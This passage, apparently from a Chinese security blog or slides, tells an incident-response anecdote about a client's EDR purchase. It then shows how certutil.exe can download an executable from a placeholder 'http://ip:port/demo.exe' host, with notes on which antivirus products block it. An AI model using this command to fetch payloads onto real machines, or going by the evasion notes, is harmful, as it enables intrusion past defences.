certutil证书下载

讲个笑话。

最近去应急响应,我去客户的单位,扫到一个深信服edr的远程代码执行。他们有很多漏洞没有修,而且黑客进来了,存在挖矿木马。我让客户下载小红伞扫描,扫出了三十多个病毒文件,360安全卫士却一个都没扫出来。

我在给客户演示的时候,她说,这不是昨天刚装上的吗,说是花了900块。

客户说,edr是什么,有没有杀毒功能。我就说是态势感知,没有杀毒功能。

然后客户就生气了,明明是想要一个杀软,深信服却卖给他们一个没有杀毒功能而且有远程代码执行漏洞的EDR。

是不是很有趣。

24

证书下载

Certutil.exe是一个命令行程序,作为证书服务的一部分安装。您可以使用Certutil.exe转储
和显示证书颁发机构(CA)配置信息,配置证书服务,备份和还原CA组件以及验证证书,
密钥对和证书链。

windows 10

certutil.exe -urlcache -split -f http://ip:port/demo.exe

25

windows 8.1

安装360以后,使用证书下载会提示拒绝访问。

26

安装火绒,会在1分钟之后默认阻止命令执行。

27